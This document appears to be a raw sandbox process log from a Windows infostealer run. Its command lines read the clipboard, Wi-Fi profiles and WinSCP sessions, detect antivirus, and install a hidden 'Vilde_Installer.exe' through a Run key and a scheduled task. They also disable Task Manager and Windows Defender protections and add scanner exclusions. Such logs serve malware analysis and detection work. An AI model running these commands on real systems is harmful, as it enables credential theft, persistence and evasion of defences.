C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A96B93E-763F-41E7-85C7-1F3CCC37EF27}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A96B93E-763F-41E7-85C7-1F3CCC37EF27}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{71024AE4-039E-4CA4-87B4-2F64180401F0}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{71024AE4-039E-4CA4-87B4-2F64180401F0}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7447A794-FA2E-42BE-BA9A-5FCBD54C5DF3}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7447A794-FA2E-42BE-BA9A-5FCBD54C5DF3}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9F51D16B-42E8-4A4A-8228-75045541A2AE}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9F51D16B-42E8-4A4A-8228-75045541A2AE}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BCC2FB07-8CF0-4542-B10C-61BCEF04AFF2}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BCC2FB07-8CF0-4542-B10C-61BCEF04AFF2}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7B73281-AB0A-4DAD-A09F-5C30D40679AC}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7B73281-AB0A-4DAD-A09F-5C30D40679AC}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CE4D7AE0-FCBA-486F-A58F-DBA3626FBE4B}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CE4D7AE0-FCBA-486F-A58F-DBA3626FBE4B}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D46F1FD9-2FE8-4D05-B2AC-011C23B69B24}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D46F1FD9-2FE8-4D05-B2AC-011C23B69B24}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E634F316-BEB6-4FB3-A612-F7102F576165}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E634F316-BEB6-4FB3-A612-F7102F576165}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\k02v5td4czh8_tezmp.ps1""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\k02v5td4czh8_tezmp.ps1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "mullvad account get"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -command "function Get-AntiVirusProduct { [CmdletBinding()] param ( [parameter(ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true)] [Alias('name')] $computername=$env:computername ) $AntiVirusProducts = Get-WmiObject -Namespace "root\\SecurityCenter2" -Class AntiVirusProduct -ComputerName $computername $ret = @() foreach ($AntiVirusProduct in $AntiVirusProducts) { switch ($AntiVirusProduct.productState) { "262144" { $defstatus = "Up to date"; $rtstatus = "Disabled" } "262160" { $defstatus = "Out of date"; $rtstatus = "Disabled" } "266240" { $defstatus = "Up to date"; $rtstatus = "Enabled" } "266256" { $defstatus = "Out of date"; $rtstatus = "Enabled" } "393216" { $defstatus = "Up to date"; $rtstatus = "Disabled" } "393232" { $defstatus = "Out of date"; $rtstatus = "Disabled" } "393488" { $defstatus = "Out of date"; $rtstatus = "Disabled" } "397312" { $defstatus = "Up to date"; $rtstatus = "Enabled" } "397328" { $defstatus = "Out of date"; $rtstatus = "Enabled" } "397584" { $defstatus = "Out of date"; $rtstatus = "Enabled" } default { $defstatus = "Unknown"; $rtstatus = "Unknown" } } $ht = @{} $ht.Computername = $computername $ht.Name = $AntiVirusProduct.displayName $ht.'Product GUID' = $AntiVirusProduct.instanceGuid $ht.'Product Executable' = $AntiVirusProduct.pathToSignedProductExe $ht.'Reporting Exe' = $AntiVirusProduct.pathToSignedReportingExe $ht.'Definition Status' = $defstatus $ht.'Real-time Protection Status' = $rtstatus # Créez un nouvel objet pour chaque ordinateur $ret += New-Object -TypeName PSObject -Property $ht } Return $ret } Get-AntiVirusProduct ""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "netsh wlan show profile"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "function Get-AntiVirusProduct {

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"

C:\Windows\system32\netsh.exe

netsh wlan show profile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetup79mlt7 /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Vilde_Installer.exe /f"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetup79mlt7 /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Vilde_Installer.exe\" /F /rl highest"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetup79mlt7 /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Vilde_Installer.exe /f

C:\Windows\system32\cmd.exe

cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetup79mlt7 /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Vilde_Installer.exe\" /F /rl highest

C:\Windows\system32\schtasks.exe

schtasks /create /sc onlogon /tn WindowsDriverSetup79mlt7 /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Vilde_Installer.exe\" /F /rl highest

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Vilde_Installer.exe\"""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Vilde_Installer.exe\""

C:\Windows\system32\attrib.exe

"C:\Windows\system32\attrib.exe" +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Vilde_Installer.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -command " $Action = New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Vilde_Installer.exe' $Trigger = New-ScheduledTaskTrigger -Daily -At '12:00PM' Register-ScheduledTask -Action $Action -Trigger $Trigger -TaskName StartCacaTask ""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "cscript C:\Users\Admin\AppData\Roaming\Z6lb7Te0yUSq.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\cscript.exe

cscript C:\Users\Admin\AppData\Roaming\Z6lb7Te0yUSq.vbs

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\AppData"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\Local"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\salut9kB5O.ps1" -RunAsAdministrator"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\salut9kB5O.ps1" -RunAsAdministrator

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\Admin\AppData\Local\Temp\C32\EvilGoose\hg\GooseDesktop.exe""

C:\Users\Admin\AppData\Local\Temp\C32\EvilGoose\hg\GooseDesktop.exe

"C:\Users\Admin\AppData\Local\Temp\C32\EvilGoose\hg\GooseDesktop.exe"

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x4f8 0x404

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

